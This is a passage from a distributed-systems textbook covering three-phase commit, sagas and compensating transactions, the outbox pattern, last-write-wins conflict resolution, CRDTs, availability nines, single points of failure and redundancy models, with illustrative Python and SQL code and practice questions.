which is what makes the protocol non-blocking.
def three_phase_commit(coordinator, participants, txn):
# PHASE 1: can you commit?
if not all(p.can_commit(txn) for p in participants):
broadcast(participants, "abort", txn)
return "aborted"
# PHASE 2: pre-commit. This is the new phase. After it, every participant
# KNOWS the vote was unanimous, so it can decide independently if the
# coordinator vanishes.
for p in participants:
p.pre_commit(txn) # durably records "outcome is commit"
# PHASE 3: do commit.
for p in participants:
p.do_commit(txn)
return "committed"
def participant_recovery(self, txn):
"""Run when the coordinator is unreachable -- the point of 3PC."""
if self.state(txn) == "pre-commit":
return self.do_commit(txn) # unanimous yes was established
if self.state(txn) == "uncertain":
peers = self.query_peers(txn) # ask others what state they are in
if any(s == "pre-commit" for s in peers):
return self.do_commit(txn) # someone got pre-commit -> commit
return self.abort(txn) # nobody did -> safe to abort
return self.abort(txn)
The catch — and the reason 3PC is essentially absent from production systems — is that its non-blocking property depends on assuming a synchronous network with reliable failure detection. Under a network partition, that assumption fails catastrophically:
WHY 3PC IS UNSAFE UNDER PARTITION
Partition splits the cluster mid-protocol:
side X: participants that RECEIVED pre-commit -> recovery rule says COMMIT
side Y: participants that did NOT -> recovery rule says ABORT
Both sides follow the protocol correctly and reach OPPOSITE decisions.
Atomicity -- the one thing the protocol exists to provide -- is violated.
2PC blocks in this situation. 3PC produces a split-brain commit. Blocking
is inconvenient; disagreeing is incorrect.
| Aspect | 2PC | 3PC |
|---|---|---|
| Round trips | 2 | 3 |
| Blocks on coordinator failure | Yes | No (under synchrony) |
| Safe under partition | Yes (blocks) | No — can produce inconsistent commits |
| Latency | Lower | ~50% higher |
| Production use | Widespread | Essentially none |
The lesson generalizes well beyond this protocol, which is the real reason to study it: 3PC traded safety for liveness, and in distributed systems that trade is almost always wrong. A protocol that stalls can be resolved by an operator or by the coordinator returning. A protocol that commits inconsistently has produced corruption that no recovery procedure can undo, because there is no record of what the correct state should have been.
The modern resolution is neither 2PC nor 3PC in their classic forms, but 2PC with a consensus-replicated coordinator. Raft makes the coordinator's decision durable and available without assuming synchrony, which removes the blocking problem while preserving safety under partition. Spanner, CockroachDB, and YugabyteDB all take this approach.
Key Takeaways
- 3PC adds a pre-commit phase so participants can infer the outcome independently and avoid blocking.
- Its non-blocking guarantee assumes a synchronous network and reliable failure detection.
- Under a partition, the two sides can correctly follow the protocol and reach opposite decisions, violating atomicity.
- The practical answer is 2PC with a consensus-replicated coordinator: safe under partition and non-blocking in practice.
🧪 Practice
- Construct the partition scenario in which 3PC produces an inconsistent commit, naming each participant's state.
- Explain why blocking is preferable to disagreement for a protocol whose purpose is atomicity.
- Interview: How does a Raft-replicated coordinator fix 2PC's blocking without 3PC's unsafety? (Hint: what exactly was unavailable in the blocking case, and can that thing be made highly available on its own?)
Saga Pattern
A saga is a sequence of local transactions where each step commits independently, and failure is handled by running compensating transactions that semantically undo the completed steps. It is the standard answer to multi-service transactions once 2PC's coupling has been ruled out.
The motivation is availability. 2PC holds locks across services for the duration of the protocol and requires every participant to be reachable. A saga holds no distributed locks at all — each step commits locally and immediately, so services remain independently available. What you surrender is isolation: intermediate states are visible to everyone.
SAGA: FORWARD PATH AND COMPENSATION
T1: reserve inventory -> OK
T2: charge card -> OK
T3: create shipment -> FAILS
|
compensate in REVERSE order:
C2: refund card <- undo T2
C1: release inventory <- undo T1
Note what compensation is NOT: it is not a rollback. The charge and the
refund BOTH appear on the customer's statement. The system reaches a
semantically equivalent state, not an identical one.
Two coordination styles exist, matching the orchestration-versus-choreography distinction from Chapter 7:
| Style | Structure | Strength | Weakness |
|---|---|---|---|
| Orchestration | A central coordinator drives steps | State is explicit and queryable | The coordinator is a component to run |
| Choreography | Each service reacts to events | No central component | The process exists nowhere; hard to debug |
# Orchestrated saga with explicit compensation, persisted between steps.
class Saga:
def __init__(self, saga_id, store):
self.id, self.store, self.steps = saga_id, store, []
def step(self, name, action, compensation):
self.steps.append((name, action, compensation))
return self
def execute(self, context):
completed = []
for name, action, compensation in self.steps:
try:
# Persist BEFORE and AFTER each step. If the orchestrator
# crashes, recovery reads this log to learn where it was and
# whether the last step's outcome is known.
self.store.mark(self.id, name, "started")
result = action(context)
context.update(result)
self.store.mark(self.id, name, "completed")
completed.append((name, compensation))
except Exception as exc:
self.store.mark(self.id, name, "failed", error=str(exc))
self._compensate(completed, context)
raise SagaFailed(name, exc)
return context
def _compensate(self, completed, context):
for name, compensation in reversed(completed):
try:
compensation(context)
self.store.mark(self.id, name, "compensated")
except Exception as exc:
# A failed compensation cannot be resolved automatically --
# the system is now in a state no code path intended.
self.store.mark(self.id, name, "compensation_failed",
error=str(exc))
alert_oncall("saga_compensation_failed", saga=self.id, step=name)
# Continue compensating the rest: partial cleanup beats none.
order_saga = (Saga(saga_id, store)
.step("inventory", reserve_inventory, release_inventory)
.step("payment", charge_card, refund_card)
.step("shipping", create_shipment, cancel_shipment)
.step("notify", send_confirmation, send_cancellation))
Sagas satisfy ACD but not I: atomicity in the semantic sense (all steps complete or all are compensated), consistency eventually, durability per step — but no isolation. That missing I produces real anomalies you must design around:
| Anomaly | What happens | Countermeasure |
|---|---|---|
| Dirty read | Another transaction reads an intermediate saga state | Semantic lock / status flag |
| Lost update | A concurrent write overwrites a saga's write | Version checks / optimistic concurrency |
| Non-repeatable read | The same read returns different values mid-saga | Re-read and re-validate |
# Semantic lock: mark the entity as in-flight so others can see and respect it.
def reserve_inventory(ctx):
db.execute("""
UPDATE inventory
SET available = available - :qty,
reserved = reserved + :qty,
saga_id = :saga_id -- the semantic lock: visible to
WHERE sku = :sku AND available >= :qty -- everyone, enforced by
""", ctx) -- application convention
if db.rowcount == 0:
raise InsufficientStock()
# Other readers see `reserved` and can choose to treat the item as
# pending rather than available. This is isolation implemented in the
# data model rather than by the database.
Three design rules make sagas workable in practice. Order steps so that irreversible actions come last — send the email after the shipment is confirmed, not before — since a step with no compensation cannot be undone. Make every step and compensation idempotent, because retries are guaranteed under at-least-once messaging. And persist saga state, so a crashed orchestrator resumes rather than restarting or, worse, leaving the saga half-run with nobody tracking it.
Key Takeaways
- A saga replaces distributed atomicity with a sequence of local transactions plus compensations, keeping services independently available.
- It provides atomicity, consistency, and durability but no isolation, so intermediate states are visible.
- Countermeasures for missing isolation — semantic locks, version checks — are implemented in the data model, not by the database.
- Order irreversible steps last, make everything idempotent, and persist saga state so a crash resumes rather than restarts.
🧪 Practice
- Design the saga for a hotel-plus-flight booking, listing every compensation and identifying which step must come last.
- Show a concrete dirty read in a saga and how a semantic lock prevents the resulting bug.
- Interview: A saga has completed four of six steps and the orchestrator dies. What must be true for recovery to be correct? (Hint: recovery must determine whether step four actually succeeded — where does it look?)
Compensating Transactions
A compensating transaction is the operation that semantically undoes a completed step. It is easy to describe and consistently underestimated, because the natural mental model — "just roll it back" — does not survive contact with the real world.
The critical distinction is between rollback and compensation. A rollback erases history: the database discards the uncommitted change and no observer ever saw it. A compensation is a new forward transaction that counteracts an earlier committed one. Both remain in the record, both were visible to anyone looking, and both may have triggered side effects of their own.
ROLLBACK vs COMPENSATION
ROLLBACK (local transaction) COMPENSATION (saga)
BEGIN T1: balance 100 -> 50 [COMMITTED]
balance 100 -> 50 (visible to everyone; a statement
ROLLBACK was generated; a webhook fired)
-> balance is 100. No trace. C1: balance 50 -> 100 [COMMITTED]
-> balance is 100, and the ledger
shows a debit AND a credit.
Compensations fall into three categories, and knowing which one you are dealing with determines how much design work is required:
| Category | Example | Compensation |
|---|---|---|
| Fully reversible | Reserve inventory | Release the reservation — state restored |
| Semantically reversible | Charge a card | Refund — net zero, but both entries persist |
| Irreversible | Send an email, launch a rocket | None possible; only mitigation |
# Fully reversible: the compensation restores the prior state exactly.
def reserve_seat(ctx):
db.execute("UPDATE seats SET status='reserved', hold_id=:hold "
"WHERE id=:seat AND status='available'", ctx)
def release_seat(ctx):
# Guarded so it only releases OUR hold. Without the hold_id check, a
# late compensation could release a seat someone else has since taken.
db.execute("UPDATE seats SET status='available', hold_id=NULL "
"WHERE id=:seat AND hold_id=:hold", ctx)
# Semantically reversible: a new transaction with its own identity.
def refund_payment(ctx):
return payments.refund(
charge_id=ctx["charge_id"],
amount=ctx["amount"],
# Idempotency is mandatory: compensations are retried like everything
# else, and a double refund is as bad as a double charge.
idempotency_key=f"refund-{ctx['saga_id']}-{ctx['charge_id']}",
)
# Irreversible: cannot be undone -- only followed up.
def compensate_notification(ctx):
# You cannot unsend an email. The only options are to send a correction
# or to have ordered this step later so it never ran.
send_email(ctx["user"], template="order_cancelled_after_confirmation")
Four properties every compensation must have:
Idempotent. It will be retried. A refund issued twice is a defect of the same severity as the original failure.
Commutative where possible. Compensations may execute in an order you did not plan, particularly when several run concurrently after a multi-branch failure.
Always eventually succeed. A compensation that can fail permanently leaves the system inconsistent with no automated path back. Compensations should be simple enough that failure is nearly impossible — and where it is not, they must escalate to a human rather than silently give up.
Ordered in reverse. Undo in the opposite order of doing, so each compensation runs against the state its corresponding action created.
# The hardest case: what to do when compensation itself fails.
def compensate_with_escalation(step, ctx, max_attempts=5):
for attempt in range(max_attempts):
try:
step.compensation(ctx)
return "compensated"
except TransientError:
time.sleep(backoff(attempt))
except PermanentError as exc:
break
# Automated recovery is exhausted. The system is in an intermediate state
# that no code path intended, so record it precisely and hand it to a
# human -- silently continuing would hide a real inconsistency.
ledger.record_inconsistency(
saga=ctx["saga_id"], step=step.name, context=ctx,
requires="manual_reconciliation")
alert_oncall("compensation_failed_permanently", saga=ctx["saga_id"])
return "manual_intervention_required"
The most valuable design habit is to ask, for every step you add to a workflow, "what undoes this?" — before writing the step. Steps that turn out to have no compensation should be moved as late as possible, replaced with a reversible two-phase equivalent (reserve then confirm, rather than commit immediately), or made conditional on everything else having already succeeded.
Key Takeaways
- Compensation is a new forward transaction, not a rollback: both the action and its undo remain visible in the record.
- Categorize each step as fully reversible, semantically reversible, or irreversible, and design accordingly.
- Compensations must be idempotent, order-tolerant, and effectively guaranteed to succeed.
- Design the compensation before the action; move irreversible steps last or restructure them as reserve-then-confirm.
🧪 Practice
- Categorize and write compensations for: reserve inventory, charge card, generate an invoice PDF, send an SMS, provision a VM.
- Explain why
release_seatcheckshold_idand what breaks without it.- Interview: How do you handle a step that genuinely cannot be compensated? (Hint: two structural answers — one changes when it runs, one changes what it does.)
Outbox Pattern
The outbox pattern solves the most common partial-failure bug in event-driven systems: a service must update its database and publish an event, and these are two different systems that cannot share a transaction.
The problem is unavoidable without it. Whichever order you choose, there is a window where a crash leaves the two out of sync — a database row with no event, or an event describing a change that was never persisted.
THE DUAL-WRITE PROBLEM (no correct ordering exists)
Option A: write DB, then publish
db.insert(order) -> OK
X crash
broker.publish(event) -> never happens
=> the order exists and no downstream service knows
Option B: publish, then write DB
broker.publish(event) -> OK
X crash
db.insert(order) -> never happens
=> downstream services process an order that does not exist
Wrapping them in try/catch does not help: the crash can occur between any
two instructions, including inside the catch block.
The outbox pattern makes the two writes atomic by putting the event in the same database as the business data, in the same transaction. A separate process then reads the outbox table and publishes to the broker.
OUTBOX PATTERN
+----------------- ONE DATABASE TRANSACTION -----------------+
| INSERT INTO orders (...) |
| INSERT INTO outbox (event_type, payload, ...) |
+------------------------------------------------------------+
|
| committed atomically: both or neither
v
+------------------------------+
| relay / CDC process | polls or tails the WAL
+------------------------------+
|
v at-least-once publish
[ message broker ]
|
v
consumers (must be idempotent)
CREATE TABLE outbox (
id BIGSERIAL PRIMARY KEY,
aggregate_type TEXT NOT NULL, -- 'order'
aggregate_id TEXT NOT NULL, -- for partition keying
event_type TEXT NOT NULL, -- 'OrderPlaced'
payload JSONB NOT NULL,
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
published_at TIMESTAMPTZ -- NULL until published
);
-- Partial index keeps the scan small even when the table holds history.
CREATE INDEX idx_outbox_unpublished ON outbox (id) WHERE published_at IS NULL;
def place_order(order):
with db.transaction(): # ONE transaction, TWO tables
order_id = db.execute(
"INSERT INTO orders (...) VALUES (...) RETURNING id", order)
db.execute("""
INSERT INTO outbox (aggregate_type, aggregate_id, event_type, payload)
VALUES ('order', :id, 'OrderPlaced', :payload)
""", {"id": order_id, "payload": json.dumps(event_for(order, order_id))})
return order_id
# A crash anywhere leaves a consistent state: either both rows exist or
# neither does. The event is now guaranteed to be published eventually.
def relay_loop():
while True:
rows = db.execute("""
SELECT id, aggregate_id, event_type, payload FROM outbox
WHERE published_at IS NULL
ORDER BY id -- preserves per-aggregate order
LIMIT 100
FOR UPDATE SKIP LOCKED -- several relays can run safely
""")
for row in rows:
broker.publish(row.event_type, row.payload, key=row.aggregate_id)
db.execute("UPDATE outbox SET published_at = NOW() WHERE id = :id",
row)
# A crash between publish and UPDATE republishes on restart.
# That is AT-LEAST-ONCE by design -- consumers must be idempotent.
if not rows:
time.sleep(0.2)
There are two ways to run the relay, and the choice matters:
| Approach | Mechanism | Trade-offs |
|---|---|---|
| Polling relay | Query the outbox table on a loop | Simple, portable; adds query load and latency |
| CDC (log tailing) | Read the database WAL (e.g. Debezium) | Near-zero latency and no query load; more infrastructure |
The pattern's guarantee is precisely at-least-once with atomicity, not exactly-once. A crash between publishing and marking the row published causes a duplicate, which is why the outbox does not remove the need for idempotent consumers — it removes the need for lost events, which is the harder problem.
Two operational details close it out. The outbox table must be pruned, or it
becomes the largest table in the database; deleting published rows older than a
retention window is a routine job. And ordering is preserved only per aggregate:
publishing with aggregate_id as the partition key gives per-entity ordering
downstream, which — as Chapter 7 established — is the ordering guarantee that
actually matters.
The mirror-image pattern, the inbox, applies the same idea on the consuming side: record the processed message ID in the same transaction as the business change, giving exactly-once effect end to end.
Key Takeaways
- The dual-write problem has no correct ordering; a crash between the two writes always leaves an inconsistency.
- The outbox makes them atomic by writing the event into the same database transaction as the business data.
- A relay publishes from the outbox with at-least-once delivery, so consumers must still be idempotent.
- Use CDC for low latency, poll for simplicity; prune the table and key publishes by aggregate ID to preserve per-entity order.
🧪 Practice
- Explain why
try/catcharound the publish call cannot fix the dual-write problem.- Write the pruning job and decide the retention window, justifying it against consumer replay needs.
- Interview: The outbox guarantees the event is published. Why do consumers still need to be idempotent? (Hint: look at the two statements in the relay loop and ask what a crash between them causes.)
Conflict Resolution and Last-Write-Wins
When a system allows concurrent writes to the same data on different replicas — which every AP system does — conflicting versions will occur. Conflict resolution is the policy for deciding what the converged value should be, and it is where "eventually consistent" stops being free.
Last-write-wins (LWW) is the simplest policy: attach a timestamp to every write and keep the one with the highest value. It requires no application logic, no extra metadata beyond a timestamp, and produces a single deterministic answer on every replica.
It also silently discards data, and it does so for a reason that has nothing to do with which write was more important: physical clock skew, as established in Section 8.3.
LWW LOSES A WRITE, WITH NO ERROR ANYWHERE
real time node A (300 ms fast) node B (100 ms slow)
10:00:00.20 write "Alice" -> ts .500
10:00:00.40 write "Bob" -> ts .100
Converged value: "Alice", because .500 > .100.
Bob's write happened LATER and is discarded. No conflict is reported, no
log records it, and Bob simply observes that his change "did not save".
The system is behaving exactly as configured.
The alternatives, in order of increasing effort and decreasing data loss:
| Strategy | Determinism | Data loss | Application effort |
|---|---|---|---|
| Last-write-wins | Yes | Silent | None |
| Highest version wins | Yes | Explicit | Version tracking |
| Sibling values | N/A | None | Client must resolve |
| Application merge | Yes | None if correct | Per-type logic |
| CRDTs | Yes | None | Choose the right type |
# LWW with a tiebreak, which is the minimum bar for correctness.
def lww_resolve(v1, v2):
if v1.timestamp != v2.timestamp:
return v1 if v1.timestamp > v2.timestamp else v2
# Equal timestamps are COMMON at millisecond resolution under load.
# Without a deterministic tiebreak, different replicas can pick
# differently and never converge at all -- a worse failure than losing
# a write. Any total order works; every replica must use the same one.
return v1 if v1.node_id > v2.node_id else v2
# Version-based: at least the loss is detectable.
def version_resolve(v1, v2):
rel = compare_vector_clocks(v1.clock, v2.clock)
if rel == "before": return v2
if rel == "after": return v1
return None # concurrent -> a REAL conflict; do not guess
# Application merge: use domain knowledge the database does not have.
def merge_shopping_cart(v1, v2):
# Union of additions, intersection of removals: nothing a customer added
# is ever lost, which is the behaviour the business actually wants.
merged = {}
for item_id in set(v1.items) | set(v2.items):
q1 = v1.items.get(item_id, 0)
q2 = v2.items.get(item_id, 0)
merged[item_id] = max(q1, q2) # deliberate: prefer keeping items
return Cart(items=merged)
The decision rule is short and worth applying explicitly:
Use LWW when the value is a single overwritable field whose history does not matter (a cached display name, a last-seen timestamp, a sensor reading), losing an occasional write is acceptable, and clocks are reasonably synchronized.
Do not use LWW when the value accumulates (carts, sets, counters), when every write carries business meaning (financial entries, audit records), or when users will notice their change vanishing.
# Cassandra applies LWW per COLUMN, which is more forgiving than per row --
# and is a distinction worth knowing.
#
# node A writes: name = 'Alice' (ts 100)
# node B writes: email = 'b@x.com' (ts 90)
#
# Both survive: they are different columns, so there is no conflict at all.
# Only concurrent writes to the SAME column contend. This is why Cassandra's
# LWW is less lossy in practice than a naive whole-document LWW -- but it
# also means a "row" can be assembled from writes that never coexisted.
That last observation generalizes: LWW at a fine granularity loses less data but can produce a combined state that no single writer ever intended. Choosing the granularity is part of choosing the policy.
Key Takeaways
- LWW is deterministic and free, and it silently discards writes based on clock skew rather than on importance.
- Equal timestamps require a deterministic tiebreak, or replicas will not converge at all.
- Version-based resolution makes conflicts detectable so they can be handled deliberately.
- Reserve LWW for overwritable single fields; use merges or CRDTs for anything that accumulates or carries business meaning.
🧪 Practice
- Construct a clock-skew scenario where LWW loses a critical write, and give two ways to prevent it.
- Explain why column-level LWW is less lossy than document-level, and what strange state it can produce instead.
- Interview: Your users report that profile edits occasionally revert. The database uses LWW. Walk through the diagnosis. (Hint: two writes and two clocks — which comparison decided the outcome?)
CRDTs
Conflict-free replicated data types are data structures designed so that concurrent updates cannot conflict. Rather than detecting conflicts and resolving them, CRDTs make the merge operation mathematically guaranteed to produce the same result on every replica, in any order, however many times it is applied.
The guarantee comes from algebra. If the merge function is commutative (order does not matter), associative (grouping does not matter), and idempotent (repetition does not matter), then replicas receiving the same set of updates converge regardless of the order or duplication with which they arrive. Those three properties define a join-semilattice, and every CRDT is one.
WHY THE ALGEBRA GUARANTEES CONVERGENCE
Replica A receives: u1, u2, u3
Replica B receives: u3, u1, u2, u1 (different order, one duplicate)
commutative -> order does not matter
associative -> grouping does not matter
idempotent -> the repeated u1 changes nothing
Therefore A and B hold the same state. No coordination occurred, no
conflict was detected, and none needed to be.
There are two families. State-based (CvRDT) replicas exchange their full state and merge with a join function; simple and robust to message loss, but the messages are large. Operation-based (CmRDT) replicas broadcast operations, which must be delivered exactly once but are small. Most production systems use a hybrid, exchanging deltas.
class GCounter:
"""Grow-only counter: the foundational CRDT."""
def __init__(self, node_id, nodes):
self.node_id = node_id
self.counts = {n: 0 for n in nodes} # each node owns ONE entry
def increment(self, n=1):
self.counts[self.node_id] += n # only ever touch your own
def value(self):
return sum(self.counts.values())
def merge(self, other):
# Elementwise max. Commutative, associative, idempotent -- because
# each node's entry only ever grows, max never loses an increment.
for n, c in other.counts.items():
self.counts[n] = max(self.counts.get(n, 0), c)
class PNCounter:
"""Increment and decrement, built from two G-Counters."""
def __init__(self, node_id, nodes):
self.inc = GCounter(node_id, nodes)
self.dec = GCounter(node_id, nodes) # decrements counted separately,
# because a single counter that
def increment(self, n=1): self.inc.increment(n) # went both ways would
def decrement(self, n=1): self.dec.increment(n) # break monotonicity
def value(self): return self.inc.value() - self.dec.value()
def merge(self, other):
self.inc.merge(other.inc)
self.dec.merge(other.dec)
class LWWElementSet:
"""A set where add and remove each carry a timestamp."""
def __init__(self):
self.adds, self.removes = {}, {} # element -> latest timestamp
def add(self, e, ts): self.adds[e] = max(self.adds.get(e, 0), ts)
def remove(self, e, ts): self.removes[e] = max(self.removes.get(e, 0), ts)
def contains(self, e):
# Bias matters: >= means add wins a tie, > would mean remove wins.
# Choose deliberately -- for a shopping cart, add-wins is right.
return e in self.adds and self.adds[e] >= self.removes.get(e, 0)
def merge(self, other):
for e, ts in other.adds.items():
self.adds[e] = max(self.adds.get(e, 0), ts)
for e, ts in other.removes.items():
self.removes[e] = max(self.removes.get(e, 0), ts)
| CRDT | Purpose | Notable characteristic |
|---|---|---|
| G-Counter | Increment-only counter | Per-node entries merged by max |
| PN-Counter | Increment and decrement | Two G-Counters |
| G-Set | Grow-only set | Union; removal impossible |
| 2P-Set | Add and remove once | Removed elements can never return |
| OR-Set | Add and remove freely | Unique tags per add; add-wins semantics |
| LWW-Register | Single value | Timestamp-based, with LWW's caveats |
| RGA / Logoot | Ordered sequence | The basis of collaborative text editing |
The cost of CRDTs is metadata and semantics. Tombstones for removed elements must be retained so a late-arriving add does not resurrect them, so a set that sees heavy churn grows even as its logical size stays constant. And the convergence is guaranteed but its meaning is fixed by the type: an OR-Set is add-wins, so a concurrent add and remove yields presence, which is right for a cart and wrong for a permission revocation.
# The semantic point, stated concretely.
# OR-Set is ADD-WINS. Concurrent add and remove -> the element is PRESENT.
#
# shopping cart: add-wins is correct (never lose a customer's item)
# access control: add-wins is DANGEROUS (a concurrent revoke loses to a
# concurrent grant, and the user keeps access)
#
# For revocation you want remove-wins, or you should not be using an
# eventually consistent structure for that decision at all.
CRDTs are used in Redis (CRDB), Riak, Automerge and Yjs (collaborative editing), Figma's multiplayer engine, and Apple's Notes sync. They are the right tool when you need writes to be available everywhere with no coordination and the data type fits one of the known structures. They are the wrong tool when the operation requires a global invariant — "never oversell inventory" cannot be a CRDT, because enforcing it requires exactly the coordination CRDTs exist to avoid.
Key Takeaways
- CRDTs make merges commutative, associative, and idempotent, so replicas converge without coordination or conflict detection.
- State-based CRDTs ship full state and tolerate message loss; operation-based ship small operations and need reliable delivery.
- Costs are metadata growth (tombstones) and fixed semantics — an OR-Set is add-wins whether or not that is what you want.
- They cannot enforce global invariants; anything requiring a cross-replica constraint still needs consensus.
🧪 Practice
- Prove that G-Counter's merge is commutative, associative, and idempotent.
- Implement an OR-Set with unique tags and show why 2P-Set cannot re-add a removed element.
- Interview: Can you build a bank account balance as a PN-Counter? (Hint: the arithmetic converges perfectly — what happens to the rule that the balance must never go below zero?)
<a id="9-reliability-availability-and-fault-tolerance"></a>
9. Reliability, Availability, and Fault Tolerance
Every component in a system eventually fails; reliability engineering is the discipline of making sure that a component failure is not a system failure. This chapter covers how availability is measured and budgeted, the patterns that stop one sick dependency from taking down everything that calls it, the failure modes that only appear at scale, and the operational practices — SLOs, error budgets, chaos experiments, postmortems — that keep reliability an explicit engineering target rather than a hope.
<a id="91-availability-engineering"></a>
9.1 Availability Engineering
Availability is the property that a system responds correctly when asked. This subchapter turns that vague goal into numbers you can budget against, then walks the structural choices — redundancy, failover topology, geographic spread — that actually move those numbers.
Availability Tiers and Nines
Availability is the fraction of time a system is usable, and it is conventionally quoted as a number of nines because the interesting differences live in the decimal places. The reason to speak in nines rather than percentages is that each additional nine is a tenfold reduction in downtime and, roughly, an order of magnitude more engineering effort and cost. Saying "we want high availability" is meaningless; saying "we want four nines" is a budget, a topology, and an on-call rotation.
The mental model that makes the numbers concrete is a downtime allowance. If you promise 99.9% availability, you are promising that the system is down for at most 43.2 minutes in a 30-day month. That is the entire budget for deploys gone wrong, dependency outages, certificate expiries, and bad database migrations combined. One botched release that takes an hour to roll back has already overspent it.
| Availability | Downtime / year | Downtime / month | Downtime / week | Typical shape |
|---|---|---|---|---|
| 90% | 36.5 days | 72 hours | 16.8 hours | A hobby project |
| 99% | 3.65 days | 7.2 hours | 100.8 minutes | Single server, manual recovery |
| 99.9% | 8.76 hours | 43.2 minutes | 10.1 minutes | Redundant instances, one AZ, on-call |
| 99.99% | 52.6 minutes | 4.32 minutes | 60.5 seconds | Multi-AZ, automated failover |
| 99.999% | 5.26 minutes | 25.9 seconds | 6.05 seconds | Multi-region, no human in the loop |
The step from 99.99% to 99.999% is the one that changes how you work. A four-minute monthly budget still permits a human to be paged, look at a dashboard, and act. A 26-second budget does not — anything that needs a person is already an SLO breach, so recovery must be fully automatic, which means the system must detect and route around its own failures without supervision.
# Availability from the two numbers that actually drive it.
# MTBF = mean time between failures (how often it breaks)
# MTTR = mean time to recovery (how long it stays broken)
def availability(mtbf_hours, mttr_hours):
return mtbf_hours / (mtbf_hours + mttr_hours)
# Same failure rate -- one failure every 30 days -- two very different outcomes.
slow_recovery = availability(720, 4.0) # 4 hours to recover
fast_recovery = availability(720, 1 / 3) # 20 minutes to recover
print(f"{slow_recovery:.5f}") # 0.99448 -> ~2.3 nines, ~48 hours down per year
print(f"{fast_recovery:.5f}") # 0.99954 -> ~3.3 nines, ~4 hours down per year
# The lesson: recovery time is the cheaper lever. Making failures 12x rarer is
# a research project; making recovery 12x faster is usually automation you can
# build this quarter.
Two composition rules matter more than any single component's rating. Dependencies in series multiply, so a request path is always less available than its weakest link. Redundant components in parallel multiply their failure probabilities, so duplication is enormously effective — provided the failures are independent.
# Series: every hop must work for the request to work.
path = 0.999 * 0.999 * 0.999 * 0.999 # LB -> API -> cache -> DB
print(f"{path:.6f}") # 0.996006 -> ~35 hours of downtime/year
# Four "three nines" dependencies deliver well under three nines end to end.
# Parallel: the system is down only if EVERY replica is down.
replicas = 1 - (1 - 0.99) ** 3 # three independent 99% replicas
print(f"{replicas:.6f}") # 0.999999 -> six nines, from cheap parts
# The word doing all the work is "independent". Three replicas on the same
# host, the same rack, or the same bad deploy fail as one component, and the
# formula silently collapses back to 0.99.
A final caution: the number you promise must match the number you can measure. Availability measured as "the process was running" is nearly meaningless; the useful definition is success rate as seen by clients — the fraction of requests that returned a correct answer within the latency the user needed.
Key Takeaways
- Each additional nine cuts downtime tenfold and costs roughly an order of magnitude more effort; pick the tier the business actually needs.
- Availability = MTBF / (MTBF + MTTR), so shortening recovery is usually cheaper than making failures rarer.
- Dependencies in series multiply availabilities: end-to-end is always worse than any single hop.
- Redundancy multiplies failure probabilities and is extremely effective, but only to the degree failures are independent.
- Measure availability as client-observed success rate, not process uptime.
🧪 Practice
- Compute the yearly downtime budget for 99.95% and decide whether a weekly 10-minute maintenance window fits inside it.
- A request passes through a CDN (99.99%), an API gateway (99.95%), a service (99.9%), and a database (99.99%). Compute end-to-end availability and name the hop worth improving first.
- Interview: Your service is rated 99.9% but a customer reports far more failures than that. What are the likely explanations? (Hint: think about what exactly is being measured, over what window, and whose requests are counted.)
Single Points of Failure
A single point of failure (SPOF) is any component whose loss takes down the whole system. Finding SPOFs is the highest-leverage reliability work available, because no amount of redundancy elsewhere compensates for one un-duplicated part on the critical path — the series rule guarantees the system inherits that component's availability exactly.
SPOFs are easy to name in a diagram and hard to find in a real system, because the dangerous ones are rarely the obvious boxes. Everyone remembers to duplicate the database. Fewer people notice that all three replicas authenticate against one identity server, that the deployment pipeline signs artifacts with one key in one region, or that the "redundant" load balancers share a single control plane that pushes configuration to both.
WHERE SPOFs ACTUALLY HIDE
[ clients ]
|
[ DNS ] <----------------- single zone, single provider, long TTL
|
[ LB-a ] [ LB-b ] redundant data plane...
\ /
\ / <----------- ...but ONE control plane pushes their config
\ /
[ api x 20 ] <--------- healthy redundancy
|
[ auth service ] <----- every request needs it; one deployment
|
[ primary DB ] --> [ replica ] failover exists, but is it tested?
|
[ shared config store ] <--- read at startup by everything; if it is
empty, a rolling restart takes out the fleet
The systematic way to find them is to walk the request path and ask, for each element, "if exactly this disappears right now, what still works?" — then repeat the walk for the control paths: deploys, configuration, secrets, DNS, service discovery, certificate renewal, and the monitoring that would tell you any of this had happened.
# A dependency audit expressed as data, so it can be asserted in CI.
COMPONENTS = {
# name (instances, failure_domains, optional)
"api": (20, ["az-a", "az-b", "az-c"], False),
"postgres_primary": (1, ["az-a"], False),
"postgres_replica": (2, ["az-b", "az-c"], True),
"auth": (3, ["az-a", "az-b", "az-c"], False),
"config_store": (1, ["az-a"], False),
"recommendations": (4, ["az-a", "az-b"], True), # degradable
}
def spofs(components):
out = []
for name, (instances, domains, optional) in components.items():
if optional: # a failure here degrades, not breaks
continue
if instances == 1 or len(set(domains)) == 1:
out.append(name) # one instance OR one failure domain
return out
print(spofs(COMPONENTS))
# ['postgres_primary', 'config_store']
#
# Note what the check counts: not just instance count but FAILURE DOMAIN count.
# Twenty replicas in a single availability zone are one SPOF in disguise.
Removing a SPOF has three possible answers, in descending order of preference: make the component redundant across independent failure domains; make the system able to run without it (degrade gracefully, cache its answers, fail open where safe); or accept it explicitly, with a documented recovery procedure and a recovery time everyone has agreed to. The third answer is legitimate — a single regional deployment may be a fine choice — but only when it is a decision rather than an oversight.
Key Takeaways
- A SPOF caps overall availability at its own, regardless of redundancy elsewhere on the path.
- The dangerous SPOFs usually sit in control planes — config, secrets, DNS, deploy pipelines — not in the boxes on the architecture diagram.
- Count independent failure domains, not instances: many replicas in one zone are still one point of failure.
- Every SPOF should be removed, degraded around, or explicitly accepted with a documented recovery plan.
🧪 Practice
- Draw your current project's request path and mark every element whose loss would stop all traffic.
- Extend the audit function so a component is also flagged when all its instances share one release version or one credential.
- Interview: A team says "we have no SPOFs, everything runs three replicas." What questions would you ask? (Hint: ask what the three replicas share — a host, a zone, a config source, a release, a certificate.)
Redundancy and Failover Models
Redundancy is having more of something than you strictly need so that losing one copy is survivable. Failover is the mechanism that redirects work to the surviving copies. The two are separate concerns, and the common failure in practice is having the first without a tested version of the second: spare capacity nobody routes to is just an expensive idle machine.
Redundancy comes in levels, and the level determines which class of failure you survive. Duplicating a process survives a crash. Duplicating across hosts survives hardware failure. Duplicating across availability zones survives a power or network event in one datacenter. Duplicating across regions survives a regional outage or a bad regional configuration push. Each level costs more and covers a strictly larger set of failures.
| Model | Spare capacity | Failover time | Cost | Typical use |
|---|---|---|---|---|
| Cold standby | Provisioned on demand | Minutes to hours | Lowest | Batch systems, DR sites |
| Warm standby | Running, not serving | Seconds to minutes | Medium | Databases, stateful services |
